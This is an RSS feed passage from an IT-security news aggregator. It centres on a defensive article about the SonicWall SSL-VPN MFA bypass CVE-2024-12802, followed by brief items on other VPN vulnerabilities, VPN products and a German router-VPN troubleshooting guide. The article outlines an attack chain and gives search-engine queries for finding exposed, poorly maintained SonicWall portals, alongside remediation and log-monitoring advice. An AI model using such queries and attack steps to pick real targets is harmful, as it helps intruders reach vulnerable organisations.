privilege escalationShared local administrator accounts, weak passwords, and reused credentials are leveraged to expand access within the environment.Transition into ransomware pre-deployment operationsAttackers deploy remote administration tools, privilege escalation utilities, and security bypass techniques to prepare for future ransomware deployment.One of the most important aspects of this attack chain is its speed. Internal reconnaissance and access to file servers may occur within minutes after VPN access is established. If SSL-VPN devices are externally exposed and account protection policies are incomplete, attackers can leverage a single vulnerability as the starting point for full internal compromise.Discovering Publicly Accessible SonicWall SSL-VPN Systems with Criminal&nbsp;IPTo assess the real-world exposure of SonicWall SSL-VPN devices, externally identifiable service indicators can be used to analyze the attack surface. Criminal IP Asset Search was used to observe internet-exposed SonicWall SSL-VPN&nbsp;assets.Criminal IP Search Query: product: sonicwall ssl-vpn web&nbsp;serverThis query identifies SonicWall SSL-VPN web server assets accessible from the public internet. As of May 2026, approximately 6,250 instances were identified. These assets indicate environments where SSL-VPN login portals or related services are externally identifiable. Since SonicWall SSL-VPN functions as an authentication gateway into internal networks, exposed devices provide attackers with opportunities to:Identify VPN&nbsp;portalsAttempt credential stuffingReuse leaked credentialsTest MFA bypass conditionsIn vulnerabilities such as CVE-2024&ndash;12802, where weaknesses in MFA handling can be exploited, simple external accessibility itself becomes a key factor determining exploitability. Even if devices run the latest firmware, Gen6 systems remain vulnerable if LDAP reconfiguration has not been completed. Even if devices run the latest firmware, Gen6 systems remain vulnerable if LDAP reconfiguration has not been completed.Criminal IP Search Query: product: sonicwall ssl-vpn web server ssl_expired: trueThis query identifies internet-facing SonicWall SSL-VPN web servers using expired SSL certificates. As of May 2026, approximately 1,200 assets were identified. While expired SSL certificates do not directly indicate exploitability of CVE-2024&ndash;12802, they may&nbsp;signal:Insufficient Security Maintenance and Operational OversightSSL certificate renewal is one of the most basic operational management tasks. Therefore, devices left exposed with expired certificates may also indicate that other security measures, such as firmware updates, LDAP reconfiguration, and MFA policy reviews, have been neglected.Weak Security Awareness Against Phishing and Man-in-the-Middle AttacksIf certificate warnings repeatedly appear on VPN login pages, legitimate users may become accustomed to ignoring them. This behavior can significantly increase the risk of credential theft and phishing-related compromise.Potential Prioritization as an Attack TargetIf an externally exposed SSL-VPN device is operating with an expired certificate, it may indicate that the asset has been deprioritized in security operations or left unmanaged for an extended period of&nbsp;time.For this reason, such assets should be prioritized for review in relation to CVE-2024&ndash;12802. In Gen6 environments especially, simply verifying firmware updates is not sufficient. Organizations must also confirm completion of LDAP reconfiguration, removal of cached LDAP users, reset of SSL-VPN User Domain settings, device reboot, and creation of new clean&nbsp;backups.Detailed analysis of one externally exposed asset identified by Criminal IP revealed:High overall risk classification73 open&nbsp;ports248 vulnerabilities39 Exploit DB referencesThis demonstrates that the issue extends beyond a simple exposed VPN portal. Multiple exposed services and vulnerabilities create an environment where attackers can explore additional attack vectors beyond VPN access itself. Such assets may become effective initial access points for internal compromise when authentication bypass vulnerabilities such as CVE-2024&ndash;12802 are&nbsp;present.This individual asset analysis demonstrates that assessing SonicWall SSL-VPN risk requires more than simply checking whether a VPN portal is exposed. Organizations should evaluate multiple factors together, including external accessibility, threat level, number of open ports, associated vulnerabilities, SSL certificate status, and hosting environment context, to establish realistic attack-priority assessments. Ultimately, the core challenge in responding to CVE-2024&ndash;12802 is not merely verifying whether patches were applied, but continuously identifying externally exposed assets that attackers can realistically discover and&nbsp;access.Security Mitigation Guidance and Best PracticesThe most critical aspect of CVE-2024&ndash;12802 remediation is understanding that, for Gen6 devices, firmware updates alone may not fully resolve the issue. Even with the latest firmware installed, MFA bypass may remain possible if legacy LDAP configurations are still present. Organizations must therefore complete the manual remediation steps described in the official advisory. While Gen7 and Gen8 devices receive the necessary protections through firmware updates, Gen6 devices may retain vulnerable LDAP configurations and require separate manual reconfiguration.Organizations operating Gen6 SonicWall SSL-VPN devices should prioritize the following checks:Verify the latest firmware version is installedRemove legacy LDAP configurations using userPrincipalNameClear cached LDAP&nbsp;usersRemove SSL-VPN User Domain&nbsp;settingsReconfigure LDAP settings after rebooting the&nbsp;deviceCreate new backups to avoid restoring vulnerable legacy configurationsOrganizations should also monitor VPN authentication logs for indicators such&nbsp;as:sess=&quot;CLI&quot; session&nbsp;typesEvent IDs 238 and&nbsp;1080Abnormal VPS/VPN-based login&nbsp;attemptsRepeated authentication attempts within short time&nbsp;periodsThese signals may serve as important indicators of automated VPN attacks or MFA bypass attempts. Because Gen6 devices officially reached end-of-support status on April 16, 2026, organizations should immediately perform manual remediation and log review in the short term, while planning migration to supported hardware in the long term. Rather than treating patch verification alone as sufficient remediation, organizations must also verify completion of configuration rework and investigate potential signs of compromise.ConclusionThe CVE-2024&ndash;12802 incident is a textbook example showing that &ldquo;being patched&rdquo; does not necessarily mean &ldquo;being protected.&rdquo; The vulnerability itself was disclosed in 2024, and firmware patches were released shortly afterward. However, a combination of incomplete remediation, the hidden requirement for a six-step manual reconfiguration process, and the structural limitation that standard patch management workflows do not verify completion of manual remediation left many organizations believing they were protected when they were&nbsp;not.The key lessons from this incident are clear: having MFA enabled and running the latest firmware does not guarantee actual security, and traces left by attackers may be indistinguishable from legitimate activity in normal logs. Organizations should immediately verify where SonicWall Gen6 devices are deployed, whether the six-step reconfiguration process has been completed, and whether indicators such as sess=&quot;CLI&quot; are present in authentication logs.In relation to this, you can refer to CVE-2026&ndash;41940: Analysis of the cPanel Authentication Bypass VulnerabilityBeyond the Patch: Understanding the SonicWall SSL-VPN MFA Bypass Exposure was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story. ]]></description>
<link>https://tsecurity.de/de/3592764/IT+Sicherheit/Hacker/Beyond+the+Patch%3A+Understanding+the+SonicWall+SSL-VPN+MFA+Bypass+Exposure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592764/IT+Sicherheit/Hacker/Beyond+the+Patch%3A+Understanding+the+SonicWall+SSL-VPN+MFA+Bypass+Exposure/</guid>
<pubDate>Fri, 12 Jun 2026 09:07:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate]]></title> 
<description><![CDATA[A CVSS 9.3 flaw in Check Point Remote Access VPN let unauthenticated attackers bypass certificate validation by supplying a crafted IKEv1 VendorID payload &mdash; exploited for 32 days before a patch, with one confirmed Qilin ransomware post-compromise chain. Check Point&hellip;
Read more &rarr;
The post Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3592741/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29%3A+Client-Controlled+IKEv1+Auth+Flipped+by+Ransomware+Affiliate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592741/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29%3A+Client-Controlled+IKEv1+Auth+Flipped+by+Ransomware+Affiliate/</guid>
<pubDate>Fri, 12 Jun 2026 09:09:26 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate]]></title> 
<description><![CDATA[A CVSS 9.3 flaw in Check Point Remote Access VPN let unauthenticated attackers bypass certificate validation by supplying a crafted IKEv1 VendorID payload &mdash; exploited for 32 days before a patch, with one confirmed Qilin ransomware post-compromise chain.
Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses. ]]></description>
<link>https://tsecurity.de/de/3592663/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29%3A+Client-Controlled+IKEv1+Auth+Flipped+by+Ransomware+Affiliate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592663/IT+Sicherheit/Cybersecurity+Nachrichten/Check+Point+VPN+Authentication+Bypass+%28CVE-2026-50751%29%3A+Client-Controlled+IKEv1+Auth+Flipped+by+Ransomware+Affiliate/</guid>
<pubDate>Fri, 12 Jun 2026 08:18:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Firefox: Gratis-VPN ohne Limits und ein Widget zur Fußball-WM]]></title> 
<description><![CDATA[




Das mit Firefox 149 eingef&uuml;hrte und in den Browser integrierte Gratis-VPN bietet ab sofort die Wahl zwischen mehr virtuellen Standorten als den bisherigen f&uuml;nf. Das nutzbare Datenvolumen ist nun unbegrenzt statt auf 50 GB pro Monat beschr&auml;nkt (Tipp: Hier stellen wir die besten VPN-Anbieter vor). Das gilt allerdings nur f&uuml;r diesen Sommer. Au&szlig;erdem bietet Firefox Widgets und zur Fu&szlig;ball-WM passende Tapeten f&uuml;r Startseite. Das gibt es alles, ohne dass Sie ein Update installieren m&uuml;ssen.



Das kostenlose VPN ist derzeit f&uuml;r Firefox-Nutzer in den USA, Kanada, Gro&szlig;britannien, Frankreich und Deutschland verf&uuml;gbar. Und nur ebendiese f&uuml;nf L&auml;nder standen bislang (seit Firefox 150) als VPN-Standorte zur Auswahl. Jetzt erweitert Mozilla die Auswahl vor&uuml;bergehend auf 28 L&auml;nder. Das ist nahe an der Standortauswahl des kostenpflichtigen Mozilla-VPN, das mehr als 30 L&auml;nder bietet. Es basiert auf Mullvad-VPN aus Schweden, das aktuell 50 L&auml;nder umfasst. Zu den L&auml;ndern im Gratis-VPN geh&ouml;ren zus&auml;tzlich Australien, Belgien, Bulgarien, Chile, D&auml;nemark, Finnland, Irland, Italien, Kolumbien, Malaysia, Mexiko, Neuseeland, die Niederlande, Norwegen, &Ouml;sterreich, Polen, Portugal, Schweden, die Schweiz, Singapur, Spanien, S&uuml;dafrika und Thailand.



▶Die neuesten Sicherheits-Updates



Wie Mozilla verlautbart, stehen die erweiterte L&auml;nderauswahl und das unbegrenzte Datenvolumen ab sofort den Sommer &uuml;ber zur Verf&uuml;gung &ndash; und das hei&szlig;t in diesem Fall: bis zum 31. August. Ab 1. September gelten wieder die bisherigen Einschr&auml;nkungen. Sie k&ouml;nnen das Gratis-VPN nur innerhalb von Firefox verwenden. Bei Mozilla-VPN gilt der Schutz hingegen f&uuml;r alle Programme. Das Gratis-VPN k&ouml;nnen Sie mit einem kostenlosen Mozilla-Konto nutzen, f&uuml;rs Mozilla-VPN m&uuml;ssen Sie ein kostenpflichtiges Abo abschlie&szlig;en. Darauf soll diese Sommeraktion wohl Appetit machen.



				
					
				
			Noch als Beta-Version ausgewiesen: das kostenlose Firefox-VPNfz



Die Sache hat f&uuml;r viele Nutzer noch einen weiteren Haken: Das Gratis-VPN geh&ouml;rt zu den Firefox-Funktionen, die schrittweise aktiviert werden, steht also nicht allen Nutzern sofort zur Verf&uuml;gung. Auch zwei Monate nach der Einf&uuml;hrung gilt es noch immer als Beta-Version und es ist noch nicht bei allen potenziellen Nutzern angekommen. Es ist allerdings denkbar, dass Mozilla im Zuge dieser Sommeraktion auch die Nutzerbasis schneller verbreitert.




Ein Tipp von mir: Wenn Sie das VPN noch nicht angeboten bekommen, kann es auch daran liegen, dass Sie die Firefox-Einstellungen auf maximalen Schutz Ihrer Privatsph&auml;re &ndash; auch gegen&uuml;ber Mozilla &ndash; getrimmt haben. An sich gut so. Aber auf zwei meiner PCs (Windows 10 + 11) hat eine &Auml;nderung sofort bewirkt, dass das VPN angeboten wird: Unter Einstellungen &raquo; Datenschutz &amp; Sicherheit &raquo; Datenerhebung durch Firefox und deren Verwendung gibt es eine Checkbox &bdquo;Firefox erlauben, Funktionen, Leistung und Stabilit&auml;t zwischen den Updates zu verbessern&ldquo;. Ist diese nicht aktiviert, setzen Sie dort einen Haken. Schauen Sie dann auf die Symbolleiste (kein Neustart n&ouml;tig).








Widgets und Hintergrundbilder zur WM



Auch beim Widget zur Fu&szlig;ball-WM kann noch ein wenig Geduld vonn&ouml;ten sein. Nach einem Firefox-Neustart k&ouml;nnen die Widgets pl&ouml;tzlich vorhanden sein. Das optionale, konfigurierbare Sport-Widget bietet sowohl Spielergebnisse als auch wahlweise einen Ausblick auf die n&auml;chsten Spiele. Au&szlig;erdem zeigt es an, auf welchem TV-Sender ein Spiel in Ihrem Land &uuml;bertragen wird. Das funktioniert auch auf Android und iOS.



				
					
				
			Was nach der WM mit dem Sport-Widget passiert, ist noch unklar.fz



Sobald in Ihrem Browser verf&uuml;gbar, finden Sie Widgets und Hintergr&uuml;nde, indem Sie auf der Firefox-Startseite (Neuer-Tab-Seite) rechts unten auf &bdquo;Anpassen&ldquo; klicken. Auch das Firefox-Logo auf der Startseite passt sich dem Thema Fu&szlig;ball an, wenn Sie das Sport-Widget aktivieren. Neben diesem Sport-Widget gibt es auch weitere Widgets, etwa f&uuml;rs Wetter, eine To-Do-Liste oder eine Weltzeituhr. Das alles m&uuml;ssen Sie nicht nutzen, es ist nur ein Angebot.



Tipp: Unabh&auml;ngig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zus&auml;tzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-L&ouml;sungen stellen wir in &bdquo;Die besten Antivirus-Programme 2025 im Test: So sch&uuml;tzen Sie Ihren Windows-PC&ldquo; vor. Falls Sie gro&szlig;en Wert auf anonymes Surfen legen, sind wiederum gute VPN-Programme einen Blick wert.



Am 16. Juni erscheinen Firefox 152, Firefox ESR 140.12, Firefox ESR 115.37.0, Thunderbird 152 und Thunderbird 140.12esr. Einen neuen Tor Browser gibt es dann auch.

 ]]></description>
<link>https://tsecurity.de/de/3592630/IT+Nachrichten/Firefox%3A+Gratis-VPN+ohne+Limits+und+ein+Widget+zur+Fu%C3%9Fball-WM/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592630/IT+Nachrichten/Firefox%3A+Gratis-VPN+ohne+Limits+und+ein+Widget+zur+Fu%C3%9Fball-WM/</guid>
<pubDate>Fri, 12 Jun 2026 08:26:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Beheben Sie Probleme mit VPN-Fernzugriff auf Ihren Heimrouter]]></title> 
<description><![CDATA[




Sie wechseln h&auml;ufig zwischen Ihrem Home-Office und einem Arbeitsplatz im B&uuml;ro. Um auch vom B&uuml;ro aus auf Arbeitsdokumente zugreifen zu k&ouml;nnen, die sich auf dem Home- Office-PC befinden, haben Sie sich eine VPN-Verbindung mit Wireguard eingerichtet: Damit erreichen Sie aus dem Unternehmensnetzwerk sicher das Heimnetz &uuml;bers Internet.



Jetzt haben Sie zu Hause einen neuen Internetanschluss: Sie haben von VDSL auf einen Glasfaseranschluss bei einem anderen Provider gewechselt. Als Sie nun aus dem B&uuml;ro versuchen, per VPN das Heimnetz zu erreichen, schl&auml;gt die Verbindung fehl. Das Problem in diesem Fall ist wahrscheinlich, dass sich mit dem Wechsel von Anschlusstechnik und Provider auch das IP-Protokoll ge&auml;ndert hat, &uuml;ber das Ihr Router erreichbar ist. 



Der Internetprovider teilt dem Router eine &ouml;ffentliche IP-Adresse zu &ndash; &uuml;blicherweise IPv4 oder IPv6 oder eine Kombination aus beiden Protokollen. Das Ger&auml;t, mit dem Sie &uuml;ber das Internet per VPN auf Ihren Router zugreifen wollen, muss dieselbe Version des IP-Protokolls nutzen wie der Router f&uuml;r seine &ouml;ffentliche IP-Adresse: 



Aus einem IPv4-Netz funktioniert es, wenn der Router eine &ouml;ffentliche IPv4-Adresse hat, allerdings nicht, wenn er nur eine &ouml;ffentliche IPv6-Adresse hat. Daher sollten Sie zun&auml;chst einmal pr&uuml;fen, wie Ihr Provider die &ouml;ffentliche IP-Adresse zuteilt: Fast alle nutzen daf&uuml;r bei privaten Internetanschl&uuml;ssen entweder Dual-Stack oder Dual-Stack-Lite (DS-Lite). 



				
					
				
			Ist der Router per Dual-Stack angebunden, sind in seinem Men&uuml; zwei &ouml;ffentliche IP-Adressen sichtbar &ndash; einmal IPv4, einmal IPv6.
Foundry



Bei Dual-Stack erh&auml;lt der Router eine &ouml;ffentliche IPv4- und eine &ouml;ffentliche IPv6-Adresse. In diesem Fall ist er nahezu immer &uuml;ber das Internet erreichbar, unabh&auml;ngig davon, wie der per VPN zugreifende Client angebunden ist. Bei DS-Lite bekommt der Router zwar eine individuelle IPv6-, aber keine eigene IPv4-Adresse. 



Eine externe Verbindungsanfrage eines Clients wie bei VPN schl&auml;gt aus diesem Grund &uuml;ber IPv4 fehl, denn die IPv4-Verbindung reicht nicht bis zum Router, sondern nur bis zum sogenannten AFTR (Address Family Transition Router) des Providers. Dieser besitzt eine &ouml;ffentliche IPv4-Adresse, die aber f&uuml;r alle mit ihm verbundenen Router seiner Kunden gilt &ndash; und das k&ouml;nnen mehrere tausend sein. 



Dual-Stack oder DS-Lite? So pr&uuml;fen Sie: Rufen Sie bei Ihrem Heimrouter das Browsermen&uuml; auf und suchen Sie nach der Option f&uuml;r die Internetverbindung &ndash; bei einer Fritzbox zum Beispiel unter &bdquo;Internet &ndash;&rsaquo; Online-Monitor &ndash;&rsaquo; Verbindungsdetails&ldquo;, bei anderen Routern sind Bezeichnungen wie etwa &bdquo;Status&ldquo; oder &bdquo;WAN&ldquo; zielf&uuml;hrend. 



Sehen Sie dort Angaben zu zwei &ouml;ffentlichen Adressen, einmal im IPv4-Format, wie zum Beispiel 93.xxx.xxx.xxx, einmal im IPv6-Format mit durch Doppelpunkte getrennten Bl&ouml;cken, benutzt der Provider Dual-Stack. Bei DS-Lite erscheint eine IPv6-Adresse, aber keine &ouml;ffentliche IPv4-Adresse. Stattdessen sehen Sie Eintr&auml;ge wie &bdquo;DS-Lite&ldquo;, &bdquo;IPv6-Tunnel&ldquo;, &bdquo;IPv4 &uuml;ber IPv6&ldquo; oder eine nicht &ouml;ffentliche IPv4-Adresse, die mit 10, 100 oder 192 beginnt.



				
					
				
			Eine Fehlermeldung wie hier beim Zugriff auf eine Fritzbox &uuml;ber Myfritz weist darauf hin, dass der Router mit einem DS-Lite-Anschluss verbunden ist.
Foundry



Damit Sie in diesem Fall eine VPN-Verbindung aus dem B&uuml;ro zum Router aufbauen k&ouml;nnen, muss der B&uuml;ro-PC per IPv6 angebunden sein. Das pr&uuml;fen Sie am zuverl&auml;ssigsten &uuml;ber Befehle in der Windows-Eingabeaufforderung: Geben Sie zun&auml;chst curl -6 https://ipv6.google.com ein. Erhalten Sie eine Fehlermeldung wie &bdquo;could not resolve host&ldquo; oder &auml;hnlich, nutzt der Client kein IPv6. 



Im Erfolgsfall sehen Sie &uuml;blicherweise den Quelltext der Webseite. Machen Sie nun den Gegentest mit curl -4 https://ipv6.google.com: Dieser Befehl ruft gezielt die IPv4-Version der Webseite auf: Hier sollte auf jeden Fall der Quelltext erscheinen. Wenn der Client ausschlie&szlig;lich IPv4 unterst&uuml;tzt, dann l&auml;sst sich ein Router zu Hause, der per DS-Lite angeschlossen ist, nicht erreichen. 



In diesem Fall k&ouml;nnen Sie den Provider fragen, ob er Ihrem Anschluss eine IPv4-Adresse zuteilen kann &ndash; dieser Service kostet aber meist extra. Sie k&ouml;nnen allerdings auch probieren, mit dem Client eine Verbindung per Mobilfunk aufzubauen &ndash; zum Beispiel, indem Sie sie ihm per Smartphone-Tethering zur Verf&uuml;gung stellen. 



Die meisten deutschen Mobilfunk-Provider nutzen Dual-Stack, sodass der Client &uuml;ber diesen Weg per IPv6 den Router zu Hause erreichen kann.



Lesetipp: So richten Sie in 5 Schritten ein sicheres Heimnetzwerk ein &ndash; auch ohne IT-Wissen

 ]]></description>
<link>https://tsecurity.de/de/3592583/IT+Betriebssysteme/Windows+Tipps/Beheben+Sie+Probleme+mit+VPN-Fernzugriff+auf+Ihren+Heimrouter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592583/IT+Betriebssysteme/Windows+Tipps/Beheben+Sie+Probleme+mit+VPN-Fernzugriff+auf+Ihren+Heimrouter/</guid>
<pubDate>Fri, 12 Jun 2026 08:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Marking Your Own Homework (Check Point Remote Access VPN IKEv1 Authentication Bypass CVE-2026-50751)]]></title> 
<description><![CDATA[It is yet another day in this parallel universe of security, where the devices we bolt onto the edge of our networks to keep the bad people out are, with remarkable consistency, the exact thing that let the bad people in.While we&rsquo;ve seemingly had a breather from ]]></description>
<link>https://tsecurity.de/de/3592535/IT+Sicherheit/Cybersecurity+Nachrichten/Marking+Your+Own+Homework+%28Check+Point+Remote+Access+VPN+IKEv1+Authentication+Bypass+CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592535/IT+Sicherheit/Cybersecurity+Nachrichten/Marking+Your+Own+Homework+%28Check+Point+Remote+Access+VPN+IKEv1+Authentication+Bypass+CVE-2026-50751%29/</guid>
<pubDate>Fri, 12 Jun 2026 07:17:20 +0200</pubDate>
</item>
<item> 
<title><![CDATA[How to choose the right VPN settings for stable streaming during high-traffic events like the 2026 World Cup]]></title> 
<description><![CDATA[By default, your VPN might not offer optimal performance for streaming during high-traffic events like the World Cup &mdash; these are the settings you should switch to. ]]></description>
<link>https://tsecurity.de/de/3591535/IT+Nachrichten/How+to+choose+the+right+VPN+settings+for+stable+streaming+during+high-traffic+events+like+the+2026+World+Cup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591535/IT+Nachrichten/How+to+choose+the+right+VPN+settings+for+stable+streaming+during+high-traffic+events+like+the+2026+World+Cup/</guid>
<pubDate>Thu, 11 Jun 2026 20:24:36 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Norton VPN dropped its price just in time for the World Cup — secure your stream for less than $4 a month]]></title> 
<description><![CDATA[Score big with Norton VPN&#039;s World Cup price drop ]]></description>
<link>https://tsecurity.de/de/3591498/IT+Nachrichten/Norton+VPN+dropped+its+price+just+in+time+for+the+World+Cup+%E2%80%94+secure+your+stream+for+less+than+%244+a+month/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591498/IT+Nachrichten/Norton+VPN+dropped+its+price+just+in+time+for+the+World+Cup+%E2%80%94+secure+your+stream+for+less+than+%244+a+month/</guid>
<pubDate>Thu, 11 Jun 2026 19:45:14 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Missing your Proton VPN Firefox add-on? You'll have to use the desktop app for now]]></title> 
<description><![CDATA[Proton VPN&#039;s Firefox extension has been temporarily removed from the Mozilla Add-ons store due to review requirements. Users are encountering loading errors, but core functionality is still available via the desktop app or Chromium-based browsers. ]]></description>
<link>https://tsecurity.de/de/3591222/IT+Nachrichten/Missing+your+Proton+VPN+Firefox+add-on%3F+You%27ll+have+to+use+the+desktop+app+for+now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591222/IT+Nachrichten/Missing+your+Proton+VPN+Firefox+add-on%3F+You%27ll+have+to+use+the+desktop+app+for+now/</guid>
<pubDate>Thu, 11 Jun 2026 18:11:47 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-11604 | OpenVPN ovpn-dco-win up to 2.5.8 Epoch Key Generator buffer size (WID-SEC-2026-1892)]]></title> 
<description><![CDATA[A vulnerability was found in OpenVPN ovpn-dco-win up to 2.5.8 and classified as problematic. This affects an unknown part of the component Epoch Key Generator. Such manipulation leads to incorrect calculation of buffer size.

This vulnerability is uniquely identified as CVE-2026-11604. Local access is required to approach this attack. No exploit exists. ]]></description>
<link>https://tsecurity.de/de/3590988/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-11604+%7C+OpenVPN+ovpn-dco-win+up+to+2.5.8+Epoch+Key+Generator+buffer+size+%28WID-SEC-2026-1892%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590988/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-11604+%7C+OpenVPN+ovpn-dco-win+up+to+2.5.8+Epoch+Key+Generator+buffer+size+%28WID-SEC-2026-1892%29/</guid>
<pubDate>Thu, 11 Jun 2026 16:55:41 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Browse securely, without limits — Mozilla scraps data cap on Firefox's free VPN for the whole summer]]></title> 
<description><![CDATA[Mozilla is making the free built-in VPN in Firefox unlimited for the summer, removing the 50GB monthly cap and opening up 28 country locations until August 31. ]]></description>
<link>https://tsecurity.de/de/3590958/IT+Nachrichten/Browse+securely%2C+without+limits+%E2%80%94+Mozilla+scraps+data+cap+on+Firefox%27s+free+VPN+for+the+whole+summer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590958/IT+Nachrichten/Browse+securely%2C+without+limits+%E2%80%94+Mozilla+scraps+data+cap+on+Firefox%27s+free+VPN+for+the+whole+summer/</guid>
<pubDate>Thu, 11 Jun 2026 17:00:50 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ExpressVPN becomes an official supporter of the FIFA World Cup 2026 in biggest sports deal yet — and gives away over 50 premium tickets]]></title> 
<description><![CDATA[ExpressVPN has announced its biggest sports partnership ever, becoming the Official Tournament Supporter for the FIFA World Cup 2026. With cyber threats expected to spike, your digital defense matters more than ever. ]]></description>
<link>https://tsecurity.de/de/3590396/IT+Nachrichten/ExpressVPN+becomes+an+official+supporter+of+the+FIFA+World+Cup+2026+in+biggest+sports+deal+yet+%E2%80%94+and+gives+away+over+50+premium+tickets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590396/IT+Nachrichten/ExpressVPN+becomes+an+official+supporter+of+the+FIFA+World+Cup+2026+in+biggest+sports+deal+yet+%E2%80%94+and+gives+away+over+50+premium+tickets/</guid>
<pubDate>Thu, 11 Jun 2026 13:30:48 +0200</pubDate>
</item>
<item> 
<title><![CDATA[[NEU] [UNGEPATCHT] [mittel] OpenVPN: Schwachstelle ermöglicht Denial of Service]]></title> 
<description><![CDATA[Ein lokaler Angreifer kann eine Schwachstelle in OpenVPN ausnutzen, um einen Denial of Service Angriff durchzuf&uuml;hren. ]]></description>
<link>https://tsecurity.de/de/3590368/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5BUNGEPATCHT%5D+%5Bmittel%5D+OpenVPN%3A+Schwachstelle+erm%C3%B6glicht+Denial+of+Service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590368/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5BUNGEPATCHT%5D+%5Bmittel%5D+OpenVPN%3A+Schwachstelle+erm%C3%B6glicht+Denial+of+Service/</guid>
<pubDate>Thu, 11 Jun 2026 13:25:53 +0200</pubDate>
</item>
<item> 
<title><![CDATA[PAN-OS-Bypass gewährt VPN-Zugang ohne Zugangsdaten]]></title> 
<description><![CDATA[Eine Schwachstelle im GlobalProtect-Portal und -Gateway von PAN-OS (CVE-2026-0257) erlaubt das F&auml;lschen von Authentifizierungs-Cookies. Angreifer bauen damit ohne g&uuml;ltige Zugangsdaten eine VPN-Verbindung ins interne Netz auf. Palo Alto Networks best&auml;tigt aktive Angriffe, die CISA hat die L&uuml;cke in den KEV-Katalog aufgenommen. ]]></description>
<link>https://tsecurity.de/de/3589584/IT+Sicherheit/Cybersecurity+Nachrichten/PAN-OS-Bypass+gew%C3%A4hrt+VPN-Zugang+ohne+Zugangsdaten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589584/IT+Sicherheit/Cybersecurity+Nachrichten/PAN-OS-Bypass+gew%C3%A4hrt+VPN-Zugang+ohne+Zugangsdaten/</guid>
<pubDate>Thu, 11 Jun 2026 07:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[PAN-OS-Bypass gewährt VPN-Zugang ohne Zugangsdaten - Security-Insider]]></title> 
<description><![CDATA[T&auml;glich die wichtigsten Infos zur IT-Sicherheit ... Mit Klick auf &bdquo;Newsletter abonnieren&ldquo; erkl&auml;re ich mich mit der Verarbeitung und Nutzung meiner Daten&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3589563/IT+Sicherheit/Cybersecurity+Nachrichten/PAN-OS-Bypass+gew%C3%A4hrt+VPN-Zugang+ohne+Zugangsdaten+-+Security-Insider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589563/IT+Sicherheit/Cybersecurity+Nachrichten/PAN-OS-Bypass+gew%C3%A4hrt+VPN-Zugang+ohne+Zugangsdaten+-+Security-Insider/</guid>
<pubDate>Thu, 11 Jun 2026 07:07:14 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Best VPNs for Usenet to Stay Safe and Anonymous]]></title> 
<description><![CDATA[When people think about downloading online files, their thoughts tend to head towards torrenting fairly quickly. In recent years, torrenting has become the default method of seeking out and downloading files, both legal and illegal, on the internet. But for those in the know, finding the best VPN for Usenet is often the first priority [&hellip;]
The post Best VPNs for Usenet to Stay Safe and Anonymous appeared first on AddictiveTips. ]]></description>
<link>https://tsecurity.de/de/3589348/IT+Betriebssysteme/Best+VPNs+for+Usenet+to+Stay+Safe+and+Anonymous/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589348/IT+Betriebssysteme/Best+VPNs+for+Usenet+to+Stay+Safe+and+Anonymous/</guid>
<pubDate>Wed, 10 Jun 2026 13:49:51 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Surfshark Test 2026 – VPN für Windows 11 im ausführlichen Praxistest - WindowsPower.de]]></title> 
<description><![CDATA[Das VPN-Netzwerk umfasst &uuml;ber 4.500 Server in 100 L&auml;ndern, betrieben ausschlie&szlig;lich auf 10-Gbit/s-Hardware. Was Surfshark von vielen Mitbewerbern&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3588237/IT+Server/Windows+Server/Surfshark+Test+2026+%E2%80%93+VPN+f%C3%BCr+Windows+11+im+ausf%C3%BChrlichen+Praxistest+-+WindowsPower.de/</link>
